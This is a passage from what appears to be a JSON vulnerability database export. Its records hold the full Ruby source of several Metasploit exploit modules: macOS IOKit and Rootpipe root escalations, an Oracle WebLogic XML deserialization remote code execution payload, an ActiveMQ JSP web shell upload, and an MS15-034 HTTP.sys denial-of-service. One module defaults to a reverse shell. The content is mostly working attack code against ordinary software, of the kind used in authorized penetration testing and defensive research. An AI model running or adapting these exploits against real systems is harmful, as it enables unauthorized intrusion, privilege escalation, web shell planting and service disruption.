By abusing a bug in the IORegistry, kernel pointers can also be leaked, allowing a full kASLR bypass. Tested on Mavericks 10.9.5, and should work on previous versions. 
The issue was patched silently in Yosemite.\n", "cvss3": {}, "published": "2014-11-25T18:34:16", "type": "metasploit", "title": "Mac OS X IOKit Keyboard Driver Root Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-4404"], "modified": "2021-02-25T16:47:49", "id": "MSF:EXPLOIT-OSX-LOCAL-IOKIT_KEYBOARD_ROOT-", "href": "https://www.rapid7.com/db/modules/exploit/osx/local/iokit_keyboard_root/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ManualRanking # Can cause kernel crash\n\n include Msf::Post::File\n include Msf::Post::OSX::Priv\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Mac OS X IOKit Keyboard Driver Root Privilege Escalation',\n 'Description' => %q{\n A heap overflow in IOHIKeyboardMapper::parseKeyMapping allows kernel memory\n corruption in Mac OS X before 10.10. 
By abusing a bug in the IORegistry, kernel\n pointers can also be leaked, allowing a full kASLR bypass.\n\n Tested on Mavericks 10.9.5, and should work on previous versions.\n\n The issue was patched silently in Yosemite.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Ian Beer', # discovery, advisory, publication, and a most excellent blog post\n 'joev' # copy/paste monkey\n ],\n 'References' =>\n [\n [ 'CVE', '2014-4404' ],\n [ 'URL', 'http://googleprojectzero.blogspot.com/2014/11/pwn4fun-spring-2014-safari-part-ii.html' ],\n # Heap overflow:\n [ 'URL', 'https://code.google.com/p/google-security-research/issues/detail?id=40' ],\n # kALSR defeat:\n [ 'URL', 'https://code.google.com/p/google-security-research/issues/detail?id=126' ]\n ],\n 'Platform' => 'osx',\n 'Arch' => ARCH_X64,\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\n 'Targets' => [\n [ 'Mac OS X 10.9.5 Mavericks x64 (Native Payload)', { } ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2014-09-24'\n ))\n end\n\n def check\n if ver_lt(osx_ver, \"10.10\")\n CheckCode::Appears\n else\n CheckCode::Safe\n end\n end\n\n def exploit\n if is_root?\n fail_with Failure::BadConfig, 'Session already has root privileges'\n end\n\n if check != CheckCode::Appears\n fail_with Failure::NotVulnerable, 'Target is not vulnerable'\n end\n\n exploit_path = File.join(Msf::Config.install_root, 'data', 'exploits', 'CVE-2014-4404')\n binary_exploit = File.read(File.join(exploit_path, 'key_exploit'))\n binary_payload = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)\n exploit_file = \"/tmp/#{Rex::Text::rand_text_alpha_lower(12)}\"\n payload_file = \"/tmp/#{Rex::Text::rand_text_alpha_lower(12)}\"\n\n print_status(\"Writing exploit file as '#{exploit_file}'\")\n write_file(exploit_file, binary_exploit)\n register_file_for_cleanup(exploit_file)\n\n print_status(\"Writing payload file as '#{payload_file}'\")\n write_file(payload_file, binary_payload)\n register_file_for_cleanup(payload_file)\n\n 
print_status(\"Executing payload...\")\n cmd_exec(\"chmod +x #{exploit_file}\")\n cmd_exec(\"chmod +x #{payload_file}\")\n cmd_exec(\"#{exploit_file} #{payload_file}\")\n end\n\n def osx_ver\n cmd_exec(\"sw_vers -productVersion\").to_s.strip\n end\n\n def ver_lt(a, b)\n Rex::Version.new(a) < Rex::Version.new(b)\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/osx/local/iokit_keyboard_root.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-23T01:32:13", "description": "The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization remote code execution vulnerability. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin of ERPScan and Federico Dotta of Media Service. Please note that SRVHOST, SRVPORT, HTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check and will not be used when executing the exploit itself.\n", "cvss3": {}, "published": "2018-01-05T20:05:21", "type": "metasploit", "title": "Oracle WebLogic wls-wsat Component Deserialization RCE", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-10271"], "modified": "2022-03-09T23:28:25", "id": "MSF:EXPLOIT-MULTI-HTTP-ORACLE_WEBLOGIC_WSAT_DESERIALIZATION_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/oracle_weblogic_wsat_deserialization_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n # include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Oracle WebLogic wls-wsat Component Deserialization RCE',\n 'Description' => %q(\n The Oracle WebLogic WLS WSAT Component is vulnerable to a XML 
Deserialization\n remote code execution vulnerability. Supported versions that are affected are\n 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin\n of ERPScan and Federico Dotta of Media Service. Please note that SRVHOST, SRVPORT,\n HTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check\n and will not be used when executing the exploit itself.\n ),\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>', # Metasploit module\n 'Luffin', # Proof of Concept\n 'Alexey Tyurin', 'Federico Dotta' # Vulnerability Discovery\n ],\n 'References' =>\n [\n ['URL', 'https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html'], # Security Bulletin\n ['URL', 'https://github.com/Luffin/CVE-2017-10271'], # Proof-of-Concept\n ['URL', 'https://github.com/kkirsche/CVE-2017-10271'], # Standalone Exploit\n ['CVE', '2017-10271'],\n ['EDB', '43458']\n ],\n 'Platform' => %w{ win unix },\n 'Arch' => [ ARCH_CMD ],\n 'Targets' =>\n [\n [ 'Windows Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'win' } ],\n [ 'Unix Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ]\n ],\n 'DisclosureDate' => '2017-10-19',\n # Note that this is by index, rather than name. 
It's generally easiest\n # just to put the default at the beginning of the list and skip this\n # entirely.\n 'DefaultTarget' => 0\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']),\n OptPort.new('RPORT', [true, \"The remote port that the WebLogic WSAT endpoint listens on\", 7001]),\n OptFloat.new('TIMEOUT', [true, \"The timeout value of requests to RHOST\", 20.0]),\n # OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the check payload', 10])\n ])\n end\n\n def cmd_base\n if target['Platform'] == 'win'\n return 'cmd'\n else\n return '/bin/sh'\n end\n end\n\n def cmd_opt\n if target['Platform'] == 'win'\n return '/c'\n else\n return '-c'\n end\n end\n\n\n #\n # This generates a XML payload that will execute the desired payload on the RHOST\n #\n def exploit_process_builder_payload\n # Generate a payload which will execute on a *nix machine using /bin/sh\n xml = %Q{<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java>\n <void class=\"java.lang.ProcessBuilder\">\n <array class=\"java.lang.String\" length=\"3\" >\n <void index=\"0\">\n <string>#{cmd_base}</string>\n </void>\n <void index=\"1\">\n <string>#{cmd_opt}</string>\n </void>\n <void index=\"2\">\n <string>#{payload.encoded.encode(xml: :text)}</string>\n </void>\n </array>\n <void method=\"start\"/>\n </void>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>}\n end\n\n #\n # This builds a XML payload that will generate a HTTP GET request to our SRVHOST\n # from the target machine.\n #\n def check_process_builder_payload\n xml = %Q{<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java version=\"1.8\" 
class=\"java.beans.XMLDecoder\">\n <void id=\"url\" class=\"java.net.URL\">\n <string>#{get_uri.encode(xml: :text)}</string>\n </void>\n <void idref=\"url\">\n <void id=\"stream\" method = \"openStream\" />\n </void>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>}\n end\n\n #\n # In the event that a 'check' host responds, we should respond randomly so that we don't clog up\n # the logs too much with a no response error or similar.\n #\n def on_request_uri(cli, request)\n random_content = '<html><head></head><body><p>'+Rex::Text.rand_text_alphanumeric(20)+'<p></body></html>'\n send_response(cli, random_content)\n\n @received_request = true\n end\n\n #\n # The exploit method connects to the remote service and sends a randomly generated string\n # encapsulated within a SOAP XML body. This will start an HTTP server for us to receive\n # the response from. This is based off of the exploit technique from\n # exploits/windows/novell/netiq_pum_eval.rb\n #\n # This doesn't work as is because MSF cannot mix HttpServer and HttpClient\n # at the time of authoring this\n #\n # def check\n # start_service\n #\n # print_status('Sending the check payload...')\n # res = send_request_cgi({\n # 'method' => 'POST',\n # 'uri' => normalize_uri(target_uri.path),\n # 'data' => check_process_builder_payload,\n # 'ctype' => 'text/xml;charset=UTF-8'\n # }, datastore['TIMEOUT'])\n #\n # print_status(\"Waiting #{datastore['HTTP_DELAY']} seconds to see if the target requests our URI...\")\n #\n # waited = 0\n # until @received_request\n # sleep 1\n # waited += 1\n # if waited > datastore['HTTP_DELAY']\n # cleanup_service\n # return Exploit::CheckCode::Safe\n # end\n # end\n #\n # cleanup_service\n # return Exploit::CheckCode::Vulnerable\n # end\n\n #\n # The exploit method connects to the remote service and sends the specified payload\n # encapsulated within a SOAP XML body.\n #\n def exploit\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => 
normalize_uri(target_uri.path),\n 'data' => exploit_process_builder_payload,\n 'ctype' => 'text/xml;charset=UTF-8'\n }, datastore['TIMEOUT'])\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-04T04:30:40", "description": "The Fileserver web application in Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request.\n", "cvss3": {}, "published": "2017-06-06T18:33:42", "type": "metasploit", "title": "ActiveMQ web shell upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-3088"], "modified": "2021-06-14T20:02:38", "id": "MSF:EXPLOIT-MULTI-HTTP-APACHE_ACTIVEMQ_UPLOAD_JSP-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/apache_activemq_upload_jsp/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'ActiveMQ web shell upload',\n 'Description' => %q(\n The Fileserver web application in Apache ActiveMQ 5.x before 5.14.0\n allows remote attackers to upload and execute arbitrary files via an\n HTTP PUT followed by an HTTP MOVE request.\n ),\n 'Author' => [ 'Ian Anderson <andrsn84[at]gmail.com>', 'Hillary Benson <1n7r1gu3[at]gmail.com>' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2016-3088' ],\n [ 'URL', 'http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt' ]\n ],\n 'Privileged' => true,\n 'Platform' => %w{ java linux win },\n 'Targets' =>\n [\n [ 'Java Universal',\n {\n 'Platform' => 'java',\n 'Arch' => 
ARCH_JAVA\n }\n ],\n [ 'Linux',\n {\n 'Platform' => 'linux',\n 'Arch' => ARCH_X86\n }\n ],\n [ 'Windows',\n {\n 'Platform' => 'win',\n 'Arch' => ARCH_X86\n }\n ]\n ],\n 'DisclosureDate' => '2016-06-01',\n 'DefaultTarget' => 0))\n register_options(\n [\n OptString.new('BasicAuthUser', [ true, 'The username to authenticate as', 'admin' ]),\n OptString.new('BasicAuthPass', [ true, 'The password for the specified username', 'admin' ]),\n OptString.new('JSP', [ false, 'JSP name to use, excluding the .jsp extension (default: random)', nil ]),\n OptString.new('AutoCleanup', [ false, 'Remove web shells after callback is received', 'true' ]),\n Opt::RPORT(8161)\n ])\n register_advanced_options(\n [\n OptString.new('UploadPath', [false, 'Custom directory into which web shells are uploaded', nil])\n ])\n end\n\n def jsp_text(payload_name)\n %{\n <%@ page import=\"java.io.*\"\n %><%@ page import=\"java.net.*\"\n %><%\n URLClassLoader cl = new java.net.URLClassLoader(new java.net.URL[]{new java.io.File(request.getRealPath(\"./#{payload_name}.jar\")).toURI().toURL()});\n Class c = cl.loadClass(\"metasploit.Payload\");\n c.getMethod(\"main\",Class.forName(\"[Ljava.lang.String;\")).invoke(null,new java.lang.Object[]{new java.lang.String[0]});\n %>}\n end\n\n def exploit\n jar_payload = payload.encoded_jar.pack\n payload_name = datastore['JSP'] || rand_text_alpha(8 + rand(8))\n host = \"#{datastore['RHOST']}:#{datastore['RPORT']}\"\n @url = datastore['SSL'] ? \"https://#{host}\" : \"http://#{host}\"\n paths = get_upload_paths\n paths.each do |path|\n if try_upload(path, jar_payload, payload_name)\n break handler if trigger_payload(payload_name)\n print_error('Unable to trigger payload')\n end\n end\n end\n\n def try_upload(path, jar_payload, payload_name)\n ['.jar', '.jsp'].each do |ext|\n file_name = payload_name + ext\n data = ext == '.jsp' ? 
jsp_text(payload_name) : jar_payload\n move_headers = { 'Destination' => \"#{@url}/#{path}/#{file_name}\" }\n upload_uri = normalize_uri('fileserver', file_name)\n print_status(\"Uploading #{move_headers['Destination']}\")\n register_files_for_cleanup \"#{path}/#{file_name}\" if datastore['AutoCleanup'].casecmp('true')\n return error_out unless send_request('PUT', upload_uri, 204, 'data' => data) &&\n send_request('MOVE', upload_uri, 204, 'headers' => move_headers)\n @trigger_resource = /webapps(.*)/.match(path)[1]\n end\n true\n end\n\n def get_upload_paths\n base_path = \"#{get_install_path}/webapps\"\n custom_path = datastore['UploadPath']\n return [normalize_uri(base_path, custom_path)] unless custom_path.nil?\n [ \"#{base_path}/api/\", \"#{base_path}/admin/\" ]\n end\n\n def get_install_path\n properties_page = send_request('GET', \"#{@url}/admin/test/\")\n fail_with(Failure::UnexpectedReply, 'Target did not respond with 200 OK to a request to /admin/test/!') if properties_page == false\n properties_page = properties_page.body\n match = properties_page.match(/activemq\\.home=([^,}]+)/)\n return match[1] unless match.nil?\n end\n\n def send_request(method, uri, expected_response = 200, opts = {})\n opts['headers'] ||= {}\n opts['headers']['Authorization'] = basic_auth(datastore['BasicAuthUser'], datastore['BasicAuthPass'])\n opts['headers']['Connection'] = 'close'\n r = send_request_cgi(\n {\n 'method' => method,\n 'uri' => uri\n }.merge(opts)\n )\n if r.nil?\n fail_with(Failure::Unreachable, 'Could not reach the target!')\n end\n return false if expected_response != r.code.to_i\n r\n end\n\n def trigger_payload(payload_name)\n send_request('POST', @url + @trigger_resource + payload_name + '.jsp')\n end\n\n def error_out\n print_error('Upload failed')\n @trigger_resource = nil\n false\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/apache_activemq_upload_jsp.rb", "cvss": {"score": 0.0, 
"vector": "NONE"}}, {"lastseen": "2023-05-28T03:32:21", "description": "This module will check if scanned hosts are vulnerable to CVE-2015-1635 (MS15-034), a vulnerability in the HTTP protocol stack (HTTP.sys) that could result in arbitrary code execution. This module will try to cause a denial-of-service.\n", "cvss3": {}, "published": "2015-04-15T18:13:16", "type": "metasploit", "title": "MS15-034 HTTP Protocol Stack Request Handling Denial-of-Service", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1635"], "modified": "2022-02-16T23:22:40", "id": "MSF:AUXILIARY-DOS-HTTP-MS15_034_ULONGLONGADD-", "href": "https://www.rapid7.com/db/modules/auxiliary/dos/http/ms15_034_ulonglongadd/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n # Watch out, dos all the things\n include Msf::Auxiliary::Scanner\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS15-034 HTTP Protocol Stack Request Handling Denial-of-Service',\n 'Description' => %q{\n This module will check if scanned hosts are vulnerable to CVE-2015-1635 (MS15-034), a\n vulnerability in the HTTP protocol stack (HTTP.sys) that could result in arbitrary code\n execution. 
This module will try to cause a denial-of-service.\n },\n 'Author' =>\n [\n # Bill did all the work (see the pastebin code), twitter: @hectorh56193716\n 'Bill Finlayson',\n # MSF. But really, these people made it happen:\n # https://github.com/rapid7/metasploit-framework/pull/5150\n 'sinn3r'\n ],\n 'References' =>\n [\n ['CVE', '2015-1635'],\n ['MSB', 'MS15-034'],\n ['URL', 'https://pastebin.com/ypURDPc4'],\n ['URL', 'https://github.com/rapid7/metasploit-framework/pull/5150'],\n ['URL', 'https://community.qualys.com/blogs/securitylabs/2015/04/20/ms15-034-analyze-and-remote-detection'],\n ['URL', 'http://www.securitysift.com/an-analysis-of-ms15-034/']\n ],\n 'License' => MSF_LICENSE\n ))\n\n register_options(\n [\n OptString.new('TARGETURI', [false, 'URI to the site (e.g /site/) or a valid file resource (e.g /welcome.png)', '/'])\n ])\n end\n\n def upper_range\n 0xFFFFFFFFFFFFFFFF\n end\n\n def run_host(ip)\n if check_host(ip) == Exploit::CheckCode::Vulnerable\n dos_host(ip)\n else\n print_status(\"Probably not vulnerable, will not dos it.\")\n end\n end\n\n # Needed to allow the vulnerable uri to be shared between the #check and #dos\n def target_uri\n @target_uri ||= super\n end\n\n def get_file_size(ip)\n @file_size ||= lambda {\n file_size = -1\n uri = normalize_uri(target_uri.path)\n res = send_request_raw('uri' => uri)\n\n unless res\n vprint_error(\"Connection timed out\")\n return file_size\n end\n\n if res.code == 404\n vprint_error(\"You got a 404. 
URI must be a valid resource.\")\n return file_size\n end\n\n file_size = res.body.length\n vprint_status(\"File length: #{file_size} bytes\")\n\n return file_size\n }.call\n end\n\n def dos_host(ip)\n file_size = get_file_size(ip)\n lower_range = file_size - 2\n\n # In here we have to use Rex because if we dos it, it causes our module to hang too\n uri = normalize_uri(target_uri.path)\n begin\n cli = Rex::Proto::Http::Client.new(ip)\n cli.connect\n req = cli.request_raw(\n 'uri' => uri,\n 'method' => 'GET',\n 'headers' => {\n 'Range' => \"bytes=#{lower_range}-#{upper_range}\"\n }\n )\n cli.send_request(req)\n rescue ::Errno::EPIPE, ::Timeout::Error\n # Same exceptions the HttpClient mixin catches\n end\n print_status(\"DOS request sent\")\n end\n\n def potential_static_files_uris\n uri = normalize_uri(target_uri.path)\n\n return [uri] unless uri[-1, 1] == '/'\n\n uris = [\"#{uri}welcome.png\"]\n res = send_request_raw('uri' => uri, 'method' => 'GET')\n\n return uris unless res\n\n site_uri = URI.parse(full_uri)\n page = Nokogiri::HTML(res.body.encode('UTF-8', invalid: :replace, undef: :replace))\n\n page.xpath('//link|//script|//style|//img').each do |tag|\n %w(href src).each do |attribute|\n attr_value = tag[attribute]\n\n next unless attr_value && !attr_value.empty?\n\n uri = site_uri.merge(URI::DEFAULT_PARSER.escape(attr_value.strip))\n\n next unless uri.host == vhost || uri.host == rhost\n\n uris << uri.path if uri.path =~ /\\.[a-z]{2,}$/i # Only keep path with a file\n end\n end\n\n uris.uniq\n end\n\n def check_host(ip)\n potential_static_files_uris.each do |potential_uri|\n uri = normalize_uri(potential_uri)\n\n res = send_request_raw(\n 'uri' => uri,\n 'method' => 'GET',\n 'headers' => {\n 'Range' => \"bytes=0-#{upper_range}\"\n }\n )\n\n vmessage = \"#{peer} - Checking #{uri}\"\n\n if res && res.body.include?('Requested Range Not Satisfiable')\n vprint_status(\"#{vmessage} [#{res.code}] - Vulnerable\")\n\n target_uri.path = uri # Needed for the DoS 
attack\n\n return Exploit::CheckCode::Vulnerable\n elsif res && res.body.include?('The request has an invalid header name')\n vprint_status(\"#{vmessage} [#{res.code}] - Safe\")\n\n return Exploit::CheckCode::Safe\n else\n vprint_status(\"#{vmessage} - Unknown\")\n end\n end\n\n Exploit::CheckCode::Unknown\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-02T12:15:28", "description": "This module exploits a hidden backdoor API in Apple's Admin framework on Mac OS X to escalate privileges to root, dubbed \"Rootpipe.\" This module was tested on Yosemite 10.10.2 and should work on previous versions. The patch for this issue was not backported to older releases. Note: you must run this exploit as an admin user to escalate to root.\n", "cvss3": {}, "published": "2015-04-10T16:22:00", "type": "metasploit", "title": "Apple OS X Rootpipe Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-1130"], "modified": "2021-02-25T16:47:49", "id": "MSF:EXPLOIT-OSX-LOCAL-ROOTPIPE-", "href": "https://www.rapid7.com/db/modules/exploit/osx/local/rootpipe/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GreatRanking\n\n include Msf::Post::File\n include Msf::Post::OSX::Priv\n include Msf::Post::OSX::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Apple OS X Rootpipe Privilege Escalation',\n 'Description' => %q{\n This module exploits a hidden backdoor API in Apple's Admin framework on\n Mac OS X to escalate privileges to root, dubbed \"Rootpipe.\"\n\n This module was tested on Yosemite 10.10.2 and should work on previous 
versions.\n\n The patch for this issue was not backported to older releases.\n\n Note: you must run this exploit as an admin user to escalate to root.\n },\n 'Author' => [\n 'Emil Kvarnhammar', # Vulnerability discovery and PoC\n 'joev', # Copy/paste monkey\n 'wvu' # Meta copy/paste monkey\n ],\n 'References' => [\n ['CVE', '2015-1130'],\n ['OSVDB', '114114'],\n ['EDB', '36692'],\n ['URL', 'https://truesecdev.wordpress.com/2015/04/09/hidden-backdoor-api-to-root-privileges-in-apple-os-x/']\n ],\n 'DisclosureDate' => '2015-04-09',\n 'License' => MSF_LICENSE,\n 'Platform' => 'osx',\n 'Arch' => ARCH_X64,\n 'SessionTypes' => ['shell'],\n 'Privileged' => true,\n 'Targets' => [\n ['Mac OS X 10.9-10.10.2', {}]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'osx/x64/shell_reverse_tcp',\n 'PrependSetreuid' => true\n }\n ))\n\n register_options [\n OptString.new('PYTHON', [true, 'Python executable', '/usr/bin/python'])\n ]\n register_advanced_options [\n OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])\n ]\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def check\n (ver? && is_admin?) ? CheckCode::Appears : CheckCode::Safe\n end\n\n def exploit\n if is_root?\n fail_with Failure::BadConfig, 'Session already has root privileges'\n end\n\n unless is_admin?\n fail_with Failure::NoAccess, \"User is not in the 'admin' group, bailing.\"\n end\n\n if check != CheckCode::Appears\n fail_with Failure::NotVulnerable, 'Target is not vulnerable'\n end\n\n unless writable? 
base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n print_status(\"Writing exploit to `#{exploit_file}'\")\n write_file(exploit_file, python_exploit)\n register_file_for_cleanup(exploit_file)\n\n print_status(\"Writing payload to `#{payload_file}'\")\n write_file(payload_file, binary_payload)\n register_file_for_cleanup(payload_file)\n\n print_status('Executing exploit...')\n cmd_exec(sploit)\n print_status('Executing payload...')\n cmd_exec(payload_file)\n end\n\n def ver?\n Rex::Version.new(get_sysinfo['ProductVersion']).between?(\n Rex::Version.new('10.9'), Rex::Version.new('10.10.2')\n )\n end\n\n def sploit\n \"#{datastore['PYTHON']} #{exploit_file} #{payload_file} #{payload_file}\"\n end\n\n def python_exploit\n File.read(File.join(\n Msf::Config.data_directory, 'exploits', 'CVE-2015-1130', 'exploit.py'\n ))\n end\n\n def binary_payload\n Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)\n end\n\n def exploit_file\n @exploit_file ||= \"#{base_dir}/#{Rex::Text.rand_text_alpha(8)}\"\n end\n\n def payload_file\n @payload_file ||= \"#{base_dir}/#{Rex::Text.rand_text_alpha(8)}\"\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/osx/local/rootpipe.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-01-11T05:27:33", "description": "A heap overflow in IOHIKeyboardMapper::parseKeyMapping allows kernel memory corruption in Mac OS X before 10.10. By abusing a bug in the IORegistry, kernel pointers can also be leaked, allowing a full kASLR bypass. Tested on Mavericks 10.9.5, and should work on previous versions. 
The issue has been patched silently in Yosemite.", "cvss3": {}, "published": "2014-12-02T00:00:00", "type": "zdt", "title": "Mac OS X IOKit Keyboard Driver Root Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-4404"], "modified": "2014-12-02T00:00:00", "id": "1337DAY-ID-22959", "href": "https://0day.today/exploit/description/22959", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'rex'\r\n\r\nclass Metasploit3 < Msf::Exploit::Local\r\n Rank = ManualRanking # Can cause kernel crash\r\n\r\n include Msf::Post::File\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Mac OS X IOKit Keyboard Driver Root Privilege Escalation',\r\n 'Description' => %q{\r\n A heap overflow in IOHIKeyboardMapper::parseKeyMapping allows kernel memory\r\n corruption in Mac OS X before 10.10. 
By abusing a bug in the IORegistry, kernel\r\n pointers can also be leaked, allowing a full kASLR bypass.\r\n\r\n Tested on Mavericks 10.9.5, and should work on previous versions.\r\n\r\n The issue has been patched silently in Yosemite.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Ian Beer', # discovery, advisory, publication, and a most excellent blog post\r\n 'joev' # copy/paste monkey\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2014-4404' ],\r\n [ 'URL', 'http://googleprojectzero.blogspot.com/2014/11/pwn4fun-spring-2014-safari-part-ii.html' ],\r\n # Heap overflow:\r\n [ 'URL', 'https://code.google.com/p/google-security-research/issues/detail?id=40' ],\r\n # kALSR defeat:\r\n [ 'URL', 'https://code.google.com/p/google-security-research/issues/detail?id=126' ]\r\n ],\r\n 'Platform' => 'osx',\r\n 'Arch' => ARCH_X86_64,\r\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\r\n 'Targets' => [\r\n [ 'Mac OS X 10.9.5 Mavericks x64 (Native Payload)', { } ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Sep 24 2014'\r\n ))\r\n end\r\n\r\n def check\r\n if ver_lt(osx_ver, \"10.10\")\r\n Exploit::CheckCode::Vulnerable\r\n else\r\n Exploit::CheckCode::Safe\r\n end\r\n end\r\n\r\n def exploit\r\n exploit_path = File.join(Msf::Config.install_root, 'data', 'exploits', 'CVE-2014-4404')\r\n binary_exploit = File.read(File.join(exploit_path, 'key_exploit'))\r\n binary_payload = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)\r\n exploit_file = \"/tmp/#{Rex::Text::rand_text_alpha_lower(12)}\"\r\n payload_file = \"/tmp/#{Rex::Text::rand_text_alpha_lower(12)}\"\r\n\r\n print_status(\"Writing exploit file as '#{exploit_file}'\")\r\n write_file(exploit_file, binary_exploit)\r\n register_file_for_cleanup(exploit_file)\r\n\r\n print_status(\"Writing payload file as '#{payload_file}'\")\r\n write_file(payload_file, binary_payload)\r\n register_file_for_cleanup(payload_file)\r\n\r\n print_status(\"Executing payload...\")\r\n cmd_exec(\"chmod +x 
